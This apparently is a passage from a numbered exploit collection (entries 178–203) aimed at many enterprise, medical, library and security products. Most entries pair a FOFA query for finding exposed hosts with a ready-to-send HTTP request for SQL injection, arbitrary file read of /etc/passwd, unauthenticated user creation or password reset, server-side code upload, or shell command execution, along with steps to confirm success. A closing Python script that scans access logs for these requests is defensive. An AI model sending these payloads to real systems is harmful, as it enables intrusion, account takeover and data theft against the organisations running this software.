/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. Lanwon (蓝网科技) Clinical Viewing System deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Check: the response is delayed by about 5 seconds (SQL Server WAITFOR DELAY, stacked after the closed quote).

190. Short Video Matrix Marketing System (短视频矩阵营销系统) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

Check: the poi parameter is fetched as a URL, so a file:// value returns the local file in the response.

191. ESAFENET (亿赛通) Electronic Document Security Management System NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

Check: the response is delayed by about 5 seconds (SQL Server WAITFOR DELAY). The PoC carries no session, and the /js/../ segment in the path is part of it; send the path exactly as shown.

192. Futong Tianxia (富通天下) Foreign Trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<%@ WebHandler Language="C#" Class="AverageHandler" %>
using System;
using System.Web;

// Minimal ASP.NET generic handler; it is stored under the .ashx name taken from the query string.
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    {
        get { return true; }
    }

    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

Check: the name=.ashx query value sets the extension of the stored file and the request body is the handler source; requesting the stored .ashx afterwards returns test.

193. Hillstone (山石网科) Yunjian (云鉴) Security Management System setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
Step 1: obtain a CSRF token for an arbitrary PHPSESSID.
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host: your-ip
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

Step 2: call setSystemTimeAction.php with that token ({{token}} below) and the same PHPSESSID. The param value is evaluated as Python (note the os.system call); the command writes a marker into a directory that the web server serves.
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

Step 3: read the marker back; a body of 23333333333456 confirms execution.
GET /master/img/config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0

194. Feiqi Hulian (飞企互联) FE Enterprise Operations Management Platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
Request /servlet/uploadAttachmentServlet first: if the servlet answers at all, the source treats the target as vulnerable.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

Check: the traversal in the filename drops the JSP into fe.war, so /hello.jsp on the same host should return hello.

195. Feiyuxing (飞鱼星) Internet Behavior Management System send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

Check: the name field is spliced into a shell command; the response contains the uname -a output.

196. Henan Fengsu Technology (河南省风速科技) Unified Authentication Platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host: your-ip
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

Check: xgh is the staff/student ID of the target account; the request carries no credentials and sets that account's password to newPass. Use a throwaway account when verifying.

197. ZJU Enter (浙大恩特) Customer Resource Management System Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

Check: the ;.js suffix on the path is part of the PoC. The UNION term 111*111 evaluates to 12321 when executed; look for that value, or for a response that differs from a plain goonumStr=1, to confirm.

198. Aliyun Drive (阿里云盘) WebDAV (aliyundrive-webdav LuCI app) command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Host: your-ip
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

Check: the sid value decodes to `ls />/www/aaa.txt` (backtick command substitution), which writes a directory listing into the web root; request /aaa.txt afterwards to read it. The request needs a valid LuCI session, so replace the sysauth cookie with one from a real login.

199. cockpit assetsmanager/upload file upload
FOFA:title="Authenticate Please!"

1. Fetch the login page to obtain the CSRF token (the csfr JWT in the response):
GET /auth/login?to=/ HTTP/1.1
Host: your-ip

Response: 200, containing csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Log in with that token to obtain the session cookie (the PoC uses admin/admin; the upload needs an authenticated session):
POST /auth/check HTTP/1.1
Host: your-ip
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload a PHP file through the assets manager with that cookie:
POST /assetsmanager/upload HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

4. The file is then served from /storage/uploads/tttt.php. It deletes itself on its first request (unlink(__FILE__)), so the check works exactly once.

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Host: your-ip
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

Check: the response is delayed by about 5 seconds (MySQL SLEEP inside a derived table, no quotes needed).

201. Founder (方正) All-Media News Editing System binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

Check: TableName is concatenated into the query, so the decoded value (DOM_IMAGE where REFID=-1 union select '1'; WAITFOR DELAY '0:0:5'; ...) stacks a delay; the response is delayed by about 5 seconds.

202. WeEngine (微擎) AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Fetch the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION placeholders below with those values. The bttnUpload value 上传图片 ("Upload image") is the button caption and is sent unchanged:
POST /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

Check: the uploaded file is reachable at /_data/Uploads/1123.txt.

203. Redsea Cloud (红海云) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

Check: the part claims image/jpeg while the filename keeps .jsp; requesting the stored 11.jsp returns hello,eHR if the extension was kept.

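For defenders the quickest sweep is over web-server access logs. The script below is an added example, not part of the original post or any vendor's tooling: it parses combined-format log lines (the sample lines are constructed from the requests above), percent-decodes and normalizes the request target, and matches it against the endpoints and URL-borne payload shapes of entries 186 to 203. POST bodies and multipart filenames never reach an access log, so for the body-based injections (186, 187, 191, 201) and the file uploads only the endpoint hit is visible; confirm those from a WAF log or a full-request capture.

```python
"""Sweep access logs for the endpoints and payload shapes of entries 186-203 (added example)."""
import posixpath
import re
import urllib.parse
from typing import Dict, List, Optional

# Request paths copied from the entries above, keyed by entry number.
ENDPOINTS: Dict[int, str] = {
    186: "/admin/pr_monitor/getting_index_data.php",
    187: "/index.cfm/_api/json/v1/default/",
    188: "/attachment",
    189: "/xds/deleteStudy.php",
    190: "/index.php/admin/Userinfo/poihuoqu",
    191: "/CDGServer3/NavigationAjax",
    192: "/JoinfApp/EMail/UploadEmailAttr",
    193: "/master/ajaxActions/setSystemTimeAction.php",
    194: "/servlet/uploadAttachmentServlet",
    195: "/send_order.cgi",
    196: "/cas/userCtl/resetPasswordBySuper",
    197: "/entsoft/Quotegask_editAction.entweb",
    198: "/cgi-bin/luci/admin/services/aliyundrive-webdav/query",
    199: "/assetsmanager/upload",
    200: "/js/player/dmplayer/dmku/",
    201: "/newsedit/newsplan/task/binary.do",
    202: "/User/AccountEdit.aspx",
    203: "/RedseaPlatform/PtFjk.mob",
}

# Payload shapes that travel in the query string of the requests above.
PAYLOAD_PATTERNS = {
    "time-based sqli": re.compile(r"sleep\s*\(|waitfor\s+delay|randomblob\s*\(", re.I),
    "union sqli": re.compile(r"union\s+(all\s+)?select", re.I),
    "file read": re.compile(r"file://|/etc/passwd", re.I),
    "command injection": re.compile(r"`|\buname\s+-a\b|os\.system\(", re.I),
}

# Combined/common log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')


def _deep_decode(text: str, plus: bool) -> str:
    """Percent-decode until stable, so double-encoded payloads are seen in clear."""
    fn = urllib.parse.unquote_plus if plus else urllib.parse.unquote
    for _ in range(3):
        nxt = fn(text)
        if nxt == text:
            break
        text = nxt
    return text


def normalize_target(target: str):
    """Return (path, query, traversal_seen). Dropping a ;suffix covers the ;.js trick of
    entry 197 and normpath collapses the /js/../ prefix of entry 191, so a request is
    matched by the handler it actually reaches rather than by the path a filter saw."""
    raw_path, _, raw_query = target.partition("?")
    path = _deep_decode(raw_path, plus=False).split(";")[0]
    traversal = "/../" in path or path.endswith("/..")
    return posixpath.normpath(path), _deep_decode(raw_query, plus=True), traversal


def scan_line(line: str) -> Optional[dict]:
    """One finding per line that touches a catalogued endpoint or carries a payload shape."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, query, traversal = normalize_target(m["target"])
    entries = [n for n, ep in ENDPOINTS.items() if posixpath.normpath(ep) == path]
    indicators = [name for name, rx in PAYLOAD_PATTERNS.items() if rx.search(query)]
    if traversal:
        indicators.append("path traversal")
    if not entries and not indicators:
        return None
    return {"ip": m["ip"], "time": m["time"], "method": m["method"], "path": path,
            "status": int(m["status"]), "entries": entries, "indicators": indicators}


def scan_log(lines) -> List[dict]:
    return [f for f in (scan_line(line) for line in lines) if f]


# Constructed sample lines (not real traffic), built from the requests in entries 188, 189, 191, 197 and 198.
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2024:10:01:02 +0800] "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/May/2024:10:01:09 +0800] "POST /CDGServer3/js/../NavigationAjax HTTP/1.1" 200 73 "-" "Mozilla/5.0"
198.51.100.7 - - [10/May/2024:10:02:15 +0800] "GET /attachment?file=/etc/passwd HTTP/1.1" 200 1893 "-" "Mozilla/5.0"
198.51.100.7 - - [10/May/2024:10:02:40 +0800] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1" 200 40 "-" "curl/8.4.0"
192.0.2.9 - - [10/May/2024:10:03:00 +0800] "GET /index.php HTTP/1.1" 200 4021 "-" "Mozilla/5.0"
192.0.2.9 - - [10/May/2024:10:03:04 +0800] "GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1%27)+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1" 200 22 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG.splitlines()):
        print(finding)
```

Five of the six sample lines produce findings; the benign /index.php request does not. Run it over real logs with scan_log(open(path)) and treat an entry hit with status 200 and an indicator as a priority for full-request review, since the decoded query is what the application saw.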